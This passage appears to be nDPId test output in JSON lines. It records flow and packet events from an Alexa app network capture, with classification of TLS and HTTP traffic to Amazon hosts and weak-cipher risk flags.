-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1273,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976088605,"flow_last_seen":1490976088849,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976088849,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1274,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1490976088850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976088850,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoNFxAAEAGEqesECrYNF7ohrKOAbuEplS1QGBw+lAQAVd7sAAA"} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1276,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976088631,"flow_last_seen":1490976088854,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976088854,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1279,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_packet_id":3,"flow_last_seen":1490976088880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976088880,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8m\/dAAEAGPiKsECrYCsl+8Z0yH5CNbMQpAAAAAKAC\/\/93BQAAAgQFtAQCCAoA9mEIAAAAAAEDAwg="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1280,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976088937,"flow_last_seen":1490976088937,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976088937,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1280,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1490976088937,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976088937,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8PTlAAEAGCbasECrYNF7ohrKPAbuIDFw0AAAAAKAC\/\/9ZowAAAgQFtAQCCAoA9mENAAAAAAEDAwg="} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1281,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976088958,"flow_last_seen":1490976088958,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976088958,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1281,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1490976088958,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976088958,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8FFJAAEAGMp2sECrYNF7ohrKQAbsDIHVdAAAAAKAC\/\/\/FYwAAAgQFtAQCCAoA9mEPAAAAAAEDAwg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1282,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976089173,"flow_last_seen":1490976089173,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976089173,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1282,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1490976089173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089173,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Al9AAEAGRJCsECrYNF7ohsHbAFAaMGN6AAAAAKAC\/\/+yQAAAAgQFtAQCCAoA9mElAAAAAAEDAwg="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1283,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976089227,"flow_last_seen":1490976089227,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976089227,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1283,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1490976089227,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089227,"pkt":"AMDKkaPvePiC0\/vCCABFAAA835BAAEAGZ16sECrYNF7ohrKSAbuabb66AAAAAKAC\/\/\/kmwAAAgQFtAQCCAoA9mEqAAAAAAEDAwg="} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1284,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976089239,"flow_last_seen":1490976089239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976089239,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1284,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1490976089239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089239,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8TPtAAEAG+fOsECrYNF7ohrKTAbvSFy3QAAAAAKAC\/\/892gAAAgQFtAQCCAoA9mErAAAAAAEDAwg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1285,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976089426,"flow_last_seen":1490976089426,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976089426,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1285,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1490976089426,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089426,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ZGdAAEAG4oesECrYNF7ohsHeAFAhsQVZAAAAAKAC\/\/8IxQAAAgQFtAQCCAoA9mE+AAAAAAEDAwg="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1289,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_packet_id":2,"flow_last_seen":1490976089930,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089930,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8PTpAAEAGCbWsECrYNF7ohrKPAbuIDFw0AAAAAKAC\/\/9ZPwAAAgQFtAQCCAoA9mFxAAAAAAEDAwg="} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1290,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":1490976089963,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976089963,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8FFNAAEAGMpysECrYNF7ohrKQAbsDIHVdAAAAAKAC\/\/\/E\/wAAAgQFtAQCCAoA9mFzAAAAAAEDAwg="} 
-01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1294,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088631,"flow_last_seen":1490976090037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976090037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1297,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088605,"flow_last_seen":1490976090037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976090037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1300,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_packet_id":2,"flow_last_seen":1490976090038,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwtKtAAOcG6040XuiGrBAq2AG7spNBzzb30hct0XASH\/5DQAAAAgQFtAEDAwY="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1301,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_packet_id":3,"flow_last_seen":1490976090038,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwe6ZAAOcGJFQ0XuiGrBAq2AG7so\/BFRS5iAxcNXASH\/4B4wAAAgQFtAEDAwY="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1302,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1490976090038,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwa1pAAOcGNKA0XuiGrBAq2ABQwd5KW8E7IbEFWnASH\/57bQAAAgQFtAEDAwY="} 
-00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1303,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_packet_id":2,"flow_last_seen":1490976090038,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwe7VAAOcGJEU0XuiGrBAq2AG7spKfnILVmm2+u3ASH\/5AVQAAAgQFtAEDAwY="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1304,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_packet_id":3,"flow_last_seen":1490976090038,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw9UZAAOcGqrM0XuiGrBAq2AG7spCu8tJmAyB1XnASH\/7CGgAAAgQFtAEDAwY="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1305,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_packet_id":2,"flow_last_seen":1490976090038,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976090038,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwjedAAOcGEhM0XuiGrBAq2ABQwds2rrGpGjBje3ASH\/5IDwAAAgQFtAEDAwY="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1313,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_packet_id":3,"flow_last_seen":1490976090170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976090170,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8AmBAAEAGRI+sECrYNF7ohsHbAFAaMGN6AAAAAKAC\/\/+x3AAAAgQFtAQCCAoA9mGJAAAAAAEDAwg="} 
-00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1314,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_packet_id":3,"flow_last_seen":1490976090173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976090173,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoTPxAAEAG+gasECrYNF7ohrKTAbvSFy3RQc82+FAQAVeNsQAA"} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1316,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_packet_id":3,"flow_last_seen":1490976090173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976090173,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoZGhAAEAG4pqsECrYNF7ohsHeAFAhsQVaSlvBPFAQAVfF3gAA"} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1317,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_packet_id":3,"flow_last_seen":1490976090173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976090173,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo35FAAEAGZ3GsECrYNF7ohrKSAbuabb67n5yC1lAQAVeKxgAA"} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1322,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089239,"flow_last_seen":1490976090191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976090191,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1323,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976088937,"flow_last_seen":1490976090191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976090191,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1324,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089227,"flow_last_seen":1490976090192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976090192,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1325,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976088958,"flow_last_seen":1490976090192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976090192,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1327,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976089426,"flow_last_seen":1490976090196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":996,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1490976090196,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49630,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/lib\/bootstrap\/img\/glyphicons-halflings.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) 
Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1343,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976089239,"flow_last_seen":1490976090313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1345,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976088958,"flow_last_seen":1490976090313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1346,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976089227,"flow_last_seen":1490976090313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976090313,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1389,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976090572,"flow_last_seen":1490976090572,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976090572,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
